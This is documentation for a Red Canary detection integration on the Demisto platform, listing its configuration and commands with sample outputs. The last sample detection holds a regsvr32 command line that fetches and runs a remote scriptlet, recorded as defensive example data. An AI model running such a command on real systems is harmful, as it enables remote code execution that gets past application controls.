Red Canary

Overview


Red Canary collects endpoint data using Carbon Black Response and CrowdStrike Falcon. The collected data is standardized into a common schema, which allows teams to detect, analyze and respond to security incidents.

Configure RedCanary on Demisto


  1. Navigate to Settings > Integrations > Servers & Services .
  2. Search for RedCanary.
  3. Click Add instance to create and configure a new integration instance.
    • Name : a textual name for the integration instance.
    • Domain (e.g., https://demisto.my.redcanary.co)
    • API Key
    • Fetch incidents
    • Incident type
    • Use system proxy settings
    • Trust any certificate (not secure)
  4. Click Test to validate the URLs, token, and connection.

Fetched Incidents Data


  • Type: RedCanaryDetection
  • ID
  • Headline
  • Severity
  • Summary
  • Classification
  • Subclassification
  • Time
  • Acknowledged
  • RemediationStatus

Commands


You can execute these commands from the Demisto CLI, as part of an automation, or in a playbook.
After you successfully execute a command, a DBot message appears in the War Room with the command details.

  1. Acknowledge a detection: redcanary-acknowledge-detection
  2. Update the remediation state of a detection: redcanary-update-remediation-state
  3. Get a list of detections: redcanary-list-detections
  4. Get a list of endpoints: redcanary-list-endpoints
  5. Execute a playbook on a detection: redcanary-execute-playbook
  6. Get an endpoint by endpoint ID: redcanary-get-endpoint
  7. Get a list of detections: redcanary-get-endpoint-detections
  8. Get a detection by the detection ID: redcanary-get-detection

1. Acknowledge a detection


Mark a detection as acknowledged to inform that it is being handled.

Base Command
redcanary-acknowledge-detection
Input
Argument Name Description Required
id Detection ID. Can be obtained from the context. Required
Context Output

There is no context output for this command.

Command Example
!redcanary-acknowledge-detection id=4
Human Readable Output

image

2. Update the remediation state of a detection


Updates the remediation state of a detection.

Base Command
redcanary-update-remediation-state
Input
Argument Name Description Required
id Detection ID. Can be obtained from the context. Required
remediation-state How the detection was remediated. Required
comment Description of why and how the detection was remediated. This is ignored for remediated state. Optional
Context Output

There is no context output for this command.

Command Example
!redcanary-update-remediation-state id=4 remediation-state=not_remediated_false_positive comment="updated by DBot"
Human Readable Output

image

3. Get a list of detections


Get a list of confirmed detections.

Base Command
redcanary-list-detections
Input
Argument Name Description Required
page The page results to fetch. Default is first page. Optional
per-page Number of results to return per page Optional
Context Output
Path Type Description
RedCanary.Detection.ID number Detection ID
RedCanary.Detection.Headline string Human-readable text about the detection
RedCanary.Detection.Severity string The severity level of the detection (High, medium, or Low)
RedCanary.Detection.Summary string A summary of information about the detection
RedCanary.Detection.Classification string Detection classification
RedCanary.Detection.Subclassification string Detection sub-classification
RedCanary.Detection.Time date The time the detection was confirmed as a threat by Red Canary
RedCanary.Detection.Acknowledged boolean Whether or not the detection is acknowledged
RedCanary.Detection.RemediationStatus string The state the detection is currently in
RedCanary.Detection.Reason string The reason for the detection
RedCanary.Detection.EndpointUserID number The ID of the user in the infected endpoint
RedCanary.Detection.EndpointID number The ID of the endpoint infected in the detection
Endpoint.Hostname string Fully-qualified endpoint hostname
Endpoint.ID string Endpoint ID
Endpoint.IPAddress unknown IP address of the endpoint
Endpoint.MACAddress unknown MAC address of the endpoint
Endpoint.OS string The operating system used by the endpoint
Endpoint.OSVersion string The complete operating system version identifier used by the endpoint
Endpoint.Memory number Physical memory of the endpoint in bytes
Endpoint.IsIsolated boolean Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned boolean Whether or not the endpoint is decommissioned
Account.Username string Endpoint user name
Account.Hostname string Endpoint host name
Command Example
!redcanary-list-detections page=1 per-page=1
Context Example
{
    "Account": {
        "Username": "administrator", 
        "Hostname": "demisto-host"
    }, 
    "Endpoint": {
        "MACAddress": [
            "08:29:42:f0:b3:7c"
        ], 
        "OS": "Windows", 
        "Hostname": "demisto-host", 
        "IsDecommissioned": true, 
        "IsIsolated": true, 
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
        "IPAddress": [
            "181.61.87.106"
        ], 
        "ID": 2
    }, 
    "RedCanary": {
        "Detection": [
            {
                "Severity": "medium", 
                "Classification": "Suspicious Activity", 
                "Acknowledged": true, 
                "Subclassification": [
                    "Process"
                ], 
                "Summary": "The Windows Task Scheduler Configuration Tool was launched via command prompt and leveraged to create multiple suspicious scheduled tasks.", 
                "Headline": "[DEM-6] Suspicious Activity (Process)", 
                "Time": "2018-09-12T15:38:17Z", 
                "Type": "RedCanaryDetection", 
                "ID": 6
            }, 
        ]
    }, 
}
Human Readable Output

image

4. Get a list of endpoints


Returns a list of endpoints.

Base Command
redcanary-list-endpoints
Input
Argument Name Description Required
page Page number in the query response. Default is 1. Optional
per-page Number of returned results per page. Default is 50 Optional
Context Output
Path Type Description
Endpoint.Hostname string Fully-qualified endpoint hostname
Endpoint.ID string Endpoint ID
Endpoint.IPAddress unknown IP address of the endpoint
Endpoint.MACAddress unknown MAC address of the endpoint
Endpoint.OS string The operating system used by the endpoint
Endpoint.OSVersion string The complete operating system version identifier used by the endpoint
Endpoint.Memory number Physical memory of the endpoint in bytes
Endpoint.IsIsolated boolean Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned boolean Whether or not the endpoint is decommissioned
Command Example
!redcanary-list-endpoints
Context Example
{
    "EndPoint": [
        {
            "MACAddress": [
                "06:79:02:e0:b0:7c"
            ], 
            "OS": "Windows", 
            "Hostname": "ec2amaz-tmlcd45", 
            "IsDecommissioned": true, 
            "IsIsolated": true, 
            "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
            "IPAddress": [
                "172.31.37.106"
            ], 
            "ID": 2
        }, 
}
Human Readable Output

image

5. Execute a playbook on a detection


Execute a predefined playbook on a detection.

Base Command
redcanary-execute-playbook
Input
Argument Name Description Required
playbook-id Playbook ID of the playbook to execute Optional
detection-id Detection ID of the detection to execute the playbook on. Can be retrieved from the context. Required
playbook-name Playbook name of the playbook to execute. If the playbook ID is specified, this is argument is ignored. Optional
Context Output

There is no context output for this command.

Command Example
!redcanary-execute-playbook detection-id=4 playbook-name=Isolate
Human Readable Output

image

6. Get an endpoint by the endpoint ID


Get an endpoint by the endpoint ID.

Base Command
redcanary-get-endpoint
Input
Argument Name Description Required
id Endpoint ID Required
Context Output
Path Type Description
Endpoint.Hostname string Fully-qualified endpoint hostname
Endpoint.ID string Endpoint ID
Endpoint.IPAddress unknown IP address of the endpoint
Endpoint.MACAddress unknown MAC address of the endpoint
Endpoint.OS string The operating system used by the endpoint
Endpoint.OSVersion string The complete operating system version identifier used by the endpoint
Endpoint.Memory number Physical memory of the endpoint in bytes
Endpoint.IsIsolated boolean Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned boolean Whether or not the endpoint is decommissioned
Command Example
!redcanary-get-endpoint id=2
Context Example
{
    "EndPoint": [
        {
            "MACAddress": [
                "06:79:02:e0:b0:7c"
            ], 
            "OS": "Windows", 
            "Hostname": "ec2amaz-tmlcd45", 
            "IsDecommissioned": true, 
            "IsIsolated": true, 
            "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
            "IPAddress": [
                "172.31.37.106"
            ], 
            "ID": 2
        }, 
}
Human Readable Output

image

7. Get a list of detections


Get a list of detections associated with the endpoint.

Base Command
redcanary-get-endpoint-detections
Input
Argument Name Description Required
id Endpoint ID Required
Context Output
Path Type Description
RedCanary.Detection.ID number Detection ID
RedCanary.Detection.Headline string Human-readable text about the detection
RedCanary.Detection.Severity string The severity of the detection (High, medium, or Low)
RedCanary.Detection.Summary string A summary of information about the detection
RedCanary.Detection.Classification string Detection classification
RedCanary.Detection.Subclassification string Detection subclassification
RedCanary.Detection.Time date The time the detection was confirmed as a threat by Red Canary
RedCanary.Detection.Acknowledged boolean Whether or not the detection is acknowledged
RedCanary.Detection.RemediationStatus string The state the detection is currently in
Endpoint.Hostname string Fully-qualified endpoint hostname
Endpoint.ID string Endpoint ID
Endpoint.IPAddress unknown IP address of the endpoint
Endpoint.MACAddress unknown MAC address of the endpoint
Endpoint.OS string The operating system used by the endpoint
Endpoint.OSVersion string The complete operating system version identifier used by the endpoint
Endpoint.Memory number Physical memory of the endpoint in bytes
Endpoint.IsIsolated boolean Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned boolean Whether or not the endpoint is decommissioned
Account.Username string Endpoint user name
Account.Hostname string Endpoint host name
Command Example
!redcanary-get-endpoint-detections id=4
Context Example
{
    "Account": {
        "Username": "administrator", 
        "Hostname": "demisto-host"
    }, 
    "Endpoint": {
        "MACAddress": [
            "08:29:42:f0:b3:7c"
        ], 
        "OS": "Windows", 
        "Hostname": "demisto-host", 
        "IsDecommissioned": true, 
        "IsIsolated": true, 
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
        "IPAddress": [
            "181.61.87.106"
        ], 
        "ID": 2
    }, 
    "RedCanary": {
        "Detection": [
            {
                "Severity": "medium", 
                "Classification": "Suspicious Activity", 
                "Acknowledged": true, 
                "Subclassification": [
                    "Process"
                ], 
                "Summary": "The Windows Task Scheduler Configuration Tool was launched via command prompt and leveraged to create multiple suspicious scheduled tasks.", 
                "Headline": "[DEM-6] Suspicious Activity (Process)", 
                "Time": "2018-09-12T15:38:17Z", 
                "Type": "RedCanaryDetection", 
                "ID": 6
            }, 
        ]
    }, 
}
Human Readable Output

image

8. Get a detection by the detection ID


Returns a detection by the detection ID.

Base Command
redcanary-get-detection
Input
Argument Name Description Required
id Detection ID Required
Context Output
Path Type Description
RedCanary.Detection.ID number Detection ID
RedCanary.Detection.Headline string Human-readable text about the detection
RedCanary.Detection.Severity string The severity of the detection. High, medium, or low
RedCanary.Detection.Summary string A summary of information about the detection
RedCanary.Detection.Classification string Detection classification
RedCanary.Detection.Subclassification string Detection subclassification
RedCanary.Detection.Time date The time the detection was confirmed as a threat by Red Canary
RedCanary.Detection.Acknowledged boolean Whether or not the detection is acknowledged
RedCanary.Detection.RemediationStatus string The state the detection is currently in
RedCanary.Detection.Reason string The reason for the detection
RedCanary.Detection.EndpointUserID number The ID of the user in the infected endpoint
RedCanary.Detection.EndpointID number The ID of the endpoint infected in the detection
Endpoint.Hostname string Fully-qualified endpoint hostname
Endpoint.ID string Endpoint ID
Endpoint.IPAddress unknown IP address of the endpoint
Endpoint.MACAddress unknown MAC address of the endpoint
Endpoint.OS string The operating system used by the endpoint
Endpoint.OSVersion string The complete operating system version identifier used by the endpoint
Endpoint.Memory number Physical memory of the endpoint in bytes
Endpoint.IsIsolated boolean Whether or not the endpoint is currently network isolated
Endpoint.IsDecommissioned boolean Whether or not the endpoint is decommissioned
Account.Username string Endpoint user name
Account.Hostname string Endpoint host name
Domain.Name string Domain name
File.Name string File name
File.MD5 string File MD5
File.SHA256 string File SHA-256
File.Path string File path in the endpoint
File.Extension string File extension
IP.Address string IP Address
IP.Port string Port
Process.Name string Process name
Process.Path string Process binary path
Process.MD5 string Binary MD5
Process.SHA256 string Binary SHA-256
Process.StartTime date Process execution time
Process.CommandLine string Process command line
Command Example
!redcanary-get-detection id=4
Context Example
{
    "Account": {
        "Username": "administrator", 
        "Hostname": "ec2amaz-tmlcd45"
    }, 
    "Endpoint": {
        "MACAddress": [
            "06:79:02:e0:b0:7c"
        ], 
        "OS": "Windows", 
        "Hostname": "ec2amaz-tmlcd45", 
        "IsDecommissioned": false, 
        "IsIsolated": true, 
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
        "IPAddress": [
            "172.31.37.106"
        ], 
        "ID": 4
    }, 
    "Process": {
        "Path": "c:\\windows\\system32\\regsvr32.exe", 
        "CommandLine": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", 
        "Name": "c:\\windows\\system32\\regsvr32.exe", 
        "StartTime": "2018-09-12T11:30:23Z", 
        "MD5": "8cf9086be38a15e905924b4a45d814d9"
    }, 
    "IP": {
        "Port": 443, 
        "Address": "151.101.12.133"
    }, 
    "Domain": {
        "Name": "raw.githubusercontent.com"
    }, 
    "RedCanary": {
        "Detection": {
            "Severity": "medium", 
            "Classification": "Malicious Software", 
            "Headline": "[DEM-4] Malicious Software", 
            "Acknowledged": false, 
            "Summary": "An instance of `Regsvr32` was leveraged to download Atomic Red Team code and execute it on this system.", 
            "Time": "2018-09-12T11:15:55Z", 
            "Type": "RedCanaryDetection", 
            "ID": 4
        }
    }, 
    "File": [
        {
            "Path": "c:\\windows\\explorer.exe", 
            "Name": "c:\\windows\\explorer.exe", 
            "Extension": ".exe", 
            "MD5": "a7190e945f2d00fe4af31289f4e64b8c"
        }, 
    ]
}
Human Readable Output

image